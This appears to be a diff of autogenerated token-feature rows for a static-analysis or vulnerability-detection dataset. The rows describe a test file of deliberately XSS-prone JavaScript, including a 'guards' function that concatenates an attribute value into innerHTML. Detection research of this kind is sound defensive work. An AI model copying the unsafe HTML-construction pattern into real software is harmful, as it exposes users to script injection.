autogenerated/Xss/UnsafeHtmlConstruction/main.js:62:43:62:50 | appendTo | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:62:52:62:55 | this | CalleeFlexibleAccessPath | $().appendTo | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:62:52:62:55 | this | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:62:52:62:55 | this | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | @@ -23093,6 +152339,93 @@ tokenFeatures | autogenerated/Xss/UnsafeHtmlConstruction/main.js:62:52:62:55 | this | enclosingFunctionBody | options defaults name name settings $ extend defaults options each $ settings name appendTo | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:62:52:62:55 | this | enclosingFunctionName | xssPlugin | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:62:52:62:55 | this | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:66:1:66:6 | module | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:66:1:66:6 | module | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:66:1:66:6 | module | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:66:1:66:14 | module.exports | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:66:1:66:14 | module.exports | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:66:1:66:14 | module.exports | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:66:1:66:21 | module. ... .guards | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:66:1:66:21 | module. ... .guards | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:66:1:66:21 | module. ... .guards | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:66:1:72:1 | module. ... }\\n} | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:66:1:72:1 | module. ... }\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:66:1:72:1 | module. ... }\\n} | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:66:8:66:14 | exports | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:66:8:66:14 | exports | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:66:8:66:14 | exports | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:66:16:66:21 | guards | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:66:16:66:21 | guards | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:66:16:66:21 | guards | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:66:25:66:24 | this | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:66:25:66:24 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:66:25:66:24 | this | enclosingFunctionBody | attrVal document querySelector #id innerHTML attrVal document querySelector #id innerHTML attrVal replace / attrVal indexOf " 1 attrVal indexOf ' 1 document querySelector #id innerHTML attrVal | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:66:25:66:24 | this | enclosingFunctionName | guards | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:66:25:66:24 | this | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:66:25:72:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:66:25:72:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:66:25:72:1 | 'arguments' object of anonymous function | enclosingFunctionBody | attrVal document querySelector #id innerHTML attrVal document querySelector #id innerHTML attrVal replace / attrVal indexOf " 1 attrVal indexOf ' 1 document querySelector #id innerHTML attrVal | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:66:25:72:1 | 'arguments' object of anonymous function | enclosingFunctionName | guards | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:66:25:72:1 | 'arguments' object of anonymous function | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:66:25:72:1 | exceptional return of anonymous function | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:66:25:72:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:66:25:72:1 | exceptional return of anonymous function | enclosingFunctionBody | attrVal document querySelector #id innerHTML attrVal document querySelector #id innerHTML attrVal replace / attrVal indexOf " 1 attrVal indexOf ' 1 document querySelector #id innerHTML attrVal | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:66:25:72:1 | exceptional return of anonymous function | enclosingFunctionName | guards | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:66:25:72:1 | exceptional return of anonymous function | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:66:25:72:1 | functio ... }\\n} | assignedToPropName | guards | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:66:25:72:1 | functio ... }\\n} | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:66:25:72:1 | functio ... }\\n} | contextSurroundingFunctionParameters | (attrVal) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:66:25:72:1 | functio ... }\\n} | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:66:25:72:1 | return of anonymous function | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:66:25:72:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:66:25:72:1 | return of anonymous function | enclosingFunctionBody | attrVal document querySelector #id innerHTML attrVal document querySelector #id innerHTML attrVal replace / attrVal indexOf " 1 attrVal indexOf ' 1 document querySelector #id innerHTML attrVal | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:66:25:72:1 | return of anonymous function | enclosingFunctionName | guards | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:66:25:72:1 | return of anonymous function | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:66:35:66:41 | attrVal | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:66:35:66:41 | attrVal | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:66:35:66:41 | attrVal | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:66:35:66:41 | attrVal | contextSurroundingFunctionParameters | (attrVal) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:66:35:66:41 | attrVal | enclosingFunctionBody | attrVal document querySelector #id innerHTML attrVal document querySelector #id innerHTML attrVal replace / attrVal indexOf " 1 attrVal indexOf ' 1 document querySelector #id innerHTML attrVal | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:66:35:66:41 | attrVal | enclosingFunctionBody | attrVal document querySelector #id innerHTML attrVal document querySelector #id innerHTML attrVal replace / attrVal indexOf " 1 attrVal indexOf ' 1 document querySelector #id innerHTML attrVal | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:66:35:66:41 | attrVal | enclosingFunctionName | guards | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:66:35:66:41 | attrVal | enclosingFunctionName | guards | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:66:35:66:41 | attrVal | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:66:35:66:41 | attrVal | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:67:5:67:12 | document | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:67:5:67:12 | document | contextSurroundingFunctionParameters | (attrVal) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:67:5:67:12 | document | enclosingFunctionBody | attrVal document querySelector #id innerHTML attrVal document querySelector #id innerHTML attrVal replace / attrVal indexOf " 1 attrVal indexOf ' 1 document querySelector #id innerHTML attrVal | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:67:5:67:12 | document | enclosingFunctionName | guards | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:67:5:67:12 | document | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:67:5:67:26 | documen ... elector | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:67:5:67:26 | documen ... elector | contextSurroundingFunctionParameters | (attrVal) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:67:5:67:26 | documen ... elector | enclosingFunctionBody | attrVal document querySelector #id innerHTML attrVal document querySelector #id innerHTML attrVal replace / attrVal indexOf " 1 attrVal indexOf ' 1 document querySelector #id innerHTML attrVal | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:67:5:67:26 | documen ... elector | enclosingFunctionName | guards | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:67:5:67:26 | documen ... elector | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:67:5:67:33 | documen ... ("#id") | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:67:5:67:33 | documen ... ("#id") | contextSurroundingFunctionParameters | (attrVal) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:67:5:67:33 | documen ... ("#id") | enclosingFunctionBody | attrVal document querySelector #id innerHTML attrVal document querySelector #id innerHTML attrVal replace / attrVal indexOf " 1 attrVal indexOf ' 1 document querySelector #id innerHTML attrVal | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:67:5:67:33 | documen ... ("#id") | enclosingFunctionName | guards | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:67:5:67:33 | documen ... ("#id") | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:67:5:67:33 | exceptional return of documen ... ("#id") | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:67:5:67:33 | exceptional return of documen ... ("#id") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:67:5:67:33 | exceptional return of documen ... ("#id") | enclosingFunctionBody | attrVal document querySelector #id innerHTML attrVal document querySelector #id innerHTML attrVal replace / attrVal indexOf " 1 attrVal indexOf ' 1 document querySelector #id innerHTML attrVal | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:67:5:67:33 | exceptional return of documen ... ("#id") | enclosingFunctionName | guards | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:67:5:67:33 | exceptional return of documen ... ("#id") | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:67:5:67:43 | documen ... nerHTML | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:67:5:67:43 | documen ... nerHTML | contextSurroundingFunctionParameters | (attrVal) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:67:5:67:43 | documen ... nerHTML | enclosingFunctionBody | attrVal document querySelector #id innerHTML attrVal document querySelector #id innerHTML attrVal replace / attrVal indexOf " 1 attrVal indexOf ' 1 document querySelector #id innerHTML attrVal | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:67:5:67:43 | documen ... nerHTML | enclosingFunctionName | guards | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:67:5:67:43 | documen ... nerHTML | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:67:5:67:78 | documen ... "\\"/>" | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:67:5:67:78 | documen ... "\\"/>" | contextSurroundingFunctionParameters | (attrVal) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:67:5:67:78 | documen ... "\\"/>" | enclosingFunctionBody | attrVal document querySelector #id innerHTML attrVal document querySelector #id innerHTML attrVal replace / attrVal indexOf " 1 attrVal indexOf ' 1 document querySelector #id innerHTML attrVal | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:67:5:67:78 | documen ... "\\"/>" | enclosingFunctionName | guards | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:67:5:67:78 | documen ... "\\"/>" | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:67:14:67:26 | querySelector | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:67:14:67:26 | querySelector | contextSurroundingFunctionParameters | (attrVal) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:67:14:67:26 | querySelector | enclosingFunctionBody | attrVal document querySelector #id innerHTML attrVal document querySelector #id innerHTML attrVal replace / attrVal indexOf " 1 attrVal indexOf ' 1 document querySelector #id innerHTML attrVal | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:67:14:67:26 | querySelector | enclosingFunctionName | guards | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:67:14:67:26 | querySelector | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:67:28:67:32 | "#id" | CalleeFlexibleAccessPath | document.querySelector | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:67:28:67:32 | "#id" | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:67:28:67:32 | "#id" | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | @@ -23101,12 +152434,22 @@ tokenFeatures | autogenerated/Xss/UnsafeHtmlConstruction/main.js:67:28:67:32 | "#id" | enclosingFunctionName | guards | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:67:28:67:32 | "#id" | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:67:28:67:32 | "#id" | receiverName | document | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:67:35:67:43 | innerHTML | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:67:35:67:43 | innerHTML | contextSurroundingFunctionParameters | (attrVal) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:67:35:67:43 | innerHTML | enclosingFunctionBody | attrVal document querySelector #id innerHTML attrVal document querySelector #id innerHTML attrVal replace / attrVal indexOf " 1 attrVal indexOf ' 1 document querySelector #id innerHTML attrVal | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:67:35:67:43 | innerHTML | enclosingFunctionName | guards | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:67:35:67:43 | innerHTML | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:67:47:67:59 | "\\"" document querySelector #id innerHTML attrVal replace / attrVal indexOf " 1 attrVal indexOf ' 1 document querySelector #id innerHTML attrVal | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:67:47:67:59 | "\\""' | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:67:47:67:69 | " attrVal document querySelector #id innerHTML attrVal replace / attrVal indexOf " 1 attrVal indexOf ' 1 document querySelector #id innerHTML attrVal | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:67:47:67:69 | "" | assignedToPropName | innerHTML | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:67:47:67:78 | "" | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:67:47:67:78 | "" | contextSurroundingFunctionParameters | (attrVal) | @@ -23125,6 +152468,41 @@ tokenFeatures | autogenerated/Xss/UnsafeHtmlConstruction/main.js:67:73:67:78 | "\\"/>" | enclosingFunctionName | guards | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:67:73:67:78 | "\\"/>" | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:67:73:67:78 | "\\"/>" | stringConcatenatedWith | '' + attrVal -endpoint- | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:5:68:12 | document | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:5:68:12 | document | contextSurroundingFunctionParameters | (attrVal) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:5:68:12 | document | enclosingFunctionBody | attrVal document querySelector #id innerHTML <img alt= document querySelector #id innerHTML attrVal replace / attrVal indexOf " 1 attrVal indexOf ' 1 document querySelector #id innerHTML attrVal | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:5:68:12 | document | enclosingFunctionName | guards | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:5:68:12 | document | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:5:68:26 | documen ... elector | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:5:68:26 | documen ... elector | contextSurroundingFunctionParameters | (attrVal) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:5:68:26 | documen ... elector | enclosingFunctionBody | attrVal document querySelector #id innerHTML attrVal document querySelector #id innerHTML attrVal replace / attrVal indexOf " 1 attrVal indexOf ' 1 document querySelector #id innerHTML attrVal | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:68:5:68:26 | documen ... elector | enclosingFunctionName | guards | +| 